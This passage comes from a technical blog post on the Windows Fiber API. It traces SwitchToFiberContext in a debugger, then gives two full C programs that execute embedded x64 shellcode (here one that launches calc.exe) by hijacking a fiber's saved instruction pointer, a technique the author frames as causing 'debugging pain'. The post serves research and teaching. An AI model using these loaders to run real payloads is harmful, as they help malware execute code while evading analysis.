00007ffc`cdd5acf8 0f85dc750400 jne KERNELBASE!SwitchToFiber+0x4760a (00007ffc`cdda22da)
00007ffc`cdd5acfe e86d720200 call KERNELBASE!SwitchToFiberContext (00007ffc`cdd81f70) ; Where the real magic happens
00007ffc`cdd5ad03 4883c428 add rsp, 28h
00007ffc`cdd5ad07 c3 ret
Most importantly, we see a call to KernelBase!SwitchToFiberContext.
This function is responsible for saving off our fiber object's context, and changing the next execution context to the destination fiber object's context.
When HotPotatoThree switches back to HotPotatoOne, the SwitchToFiberContext function restores the stack such that execution returns into the fiber after the call to SwitchToFiberContext.
Since HotPotatoOne called SwitchToFiber, the return back to HotPotatoOne from SwitchToFiber is done by returning from SwitchToFiberContext:
0:000> u rip-0x10
KERNELBASE!SwitchToFiberContext+0x1f0:
00007ffc`cdd82160 50 push rax
00007ffc`cdd82161 3441 xor al,41h
00007ffc`cdd82163 d9a800010000 fldcw word ptr [rax+100h]
00007ffc`cdd82169 498ba098000000 mov rsp,qword ptr [r8+98h] ; restore original rsp
00007ffc`cdd82170 c3 ret ; <- CURRENT RIP
0:000> dq rsp L1
000000c4`536ff6b8 00007ffc`cdd5ad03 ; Return to KernelBase!SwitchToFiber
0:000> t    <- return into SwitchToFiber
Time Travel Position: 102:AA
KERNELBASE!SwitchToFiber+0x33:
00007ffc`cdd5ad03 4883c428 add rsp,28h
0:000> t    <- step to the return instruction
Time Travel Position: 102:AB
KERNELBASE!SwitchToFiber+0x37:
00007ffc`cdd5ad07 c3 ret
0:000> dq rsp L1    <- see where we're returning to.... aaaand!
000000c4`536ff6e8 00007ff6`49e55a89
0:000> u poi(rsp)
FiberBlog!HotPotatoOne+0x79 [Source.cpp @ 54]:    <- HELL yes! A return finally back into HotPotatoOne from HotPotatoThree
00007ff6`49e55a89 488b4508 mov rax,qword ptr [rbp+8]
00007ff6`49e55a8d 813839050000 cmp dword ptr [rax],539h
00007ff6`49e55a93 72ba jb FiberBlog!HotPotatoOne+0x3f (00007ff6`49e55a4f)
00007ff6`49e55a95 b808000000 mov eax,8
00007ff6`49e55a9a 486bc000 imul rax,rax,0
00007ff6`49e55a9e 488d0d737c0000 lea rcx,[FiberBlog!HOT_POTATOES (00007ff6`49e5d718)]
00007ff6`49e55aa5 488b0c01 mov rcx,qword ptr [rcx+rax]
00007ff6`49e55aa9 ff1551b50000 call qword ptr [FiberBlog!_imp_SwitchToFiber (00007ff6`49e61000)]
Phew.
Quite the long journey so far, but we did it!
Now for the fun part.
0x04: Misdirection
We've talked about how fibers are created, allocated, switched to, and where the initial instruction pointer lives in memory.
Let's put this all together to cause some debugging pain.
I give you:
Two methods to execute shellcode in a really weird way. ¯\_(ツ)_/¯
Method 1:
#include <Windows.h>
#include <stdio.h>
#define TEB_FIBERDATA_PTR_OFFSET 0x17ee
#define LPFIBER_RIP_OFFSET 0x0a8
// calc shellcode
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
typedef int(WINAPI* tRtlUserFiberStart)();
int main() {
HMODULE hMod = GetModuleHandleA("ntdll");
if (!hMod) { return -1; }
tRtlUserFiberStart lpRtlUserFiberStart = (tRtlUserFiberStart) GetProcAddress(hMod, "RtlUserFiberStart");
if (!lpRtlUserFiberStart) { return -1; }
_TEB* teb = NtCurrentTeb();
NT_TIB* tib = (NT_TIB*)teb;
void* pTebFlags = (void*)((uintptr_t)teb + TEB_FIBERDATA_PTR_OFFSET);
*(char*)pTebFlags = *(char*)pTebFlags | 0b100; // set the HasFiberData bit
LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!addr) {
return GetLastError();
}
RtlMoveMemory(addr, op, sizeof(op));
uintptr_t lpDummyFiberData = (uintptr_t)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100);
*(LPVOID*)(lpDummyFiberData + LPFIBER_RIP_OFFSET) = addr; // store the shellcode address at the offset of the FiberContext RIP in the Fiber Data
//call qword ptr [ntdll!_guard_dispatch_icall_fptr (00007ffa`218b4000)] ds:00007ffa`218b4000={ntdll!guard_dispatch_icall_nop (00007ffa`217cfa80)}
__writegsqword(0x20, lpDummyFiberData); // set the FiberData pointer
lpRtlUserFiberStart();
}
Huge shoutout to s4r1n.
From my contribution to his repo
Method 2:
#include <Windows.h>
#include <stdio.h>
// calc shellcode
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
void dummy() {
puts("Hello Fiber from Dummy");
}
//https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c
//https://doxygen.reactos.org/dd/d83/ndk_2ketypes_8h_source.html#l00179
// s/o to ch3rn0byl and s4r1n
// am I doing s00p3r c001 1337 gr33tz right?
int main() {
LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!addr) {
return GetLastError();
}
RtlMoveMemory(addr, op, sizeof(op));
_TEB* teb = NtCurrentTeb();
NT_TIB* tib = (NT_TIB*)teb;
//https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c#L256
ConvertThreadToFiber(NULL);
LPVOID lpFiber = CreateFiber(0x100, (LPFIBER_START_ROUTINE)dummy, NULL);
if (lpFiber == NULL) {
printf("GLE : %d", GetLastError());
exit(0);
}
uintptr_t* tgtFuncAddr = (uintptr_t*)((uintptr_t)lpFiber + 0xB0);
*tgtFuncAddr = (uintptr_t)addr;
SwitchToFiber(lpFiber);
return 1;
}
Thank you for reading!
I hope at the very least you learned something neat about the Windows Fiber API.
Some great links:
https://nullprogram.com/blog/2019/03/28/
https://devblogs.microsoft.com/oldnewthing/20191011-00/?p=102989
s/o to all the cool as hell people in my life.
You know who you are.
🚀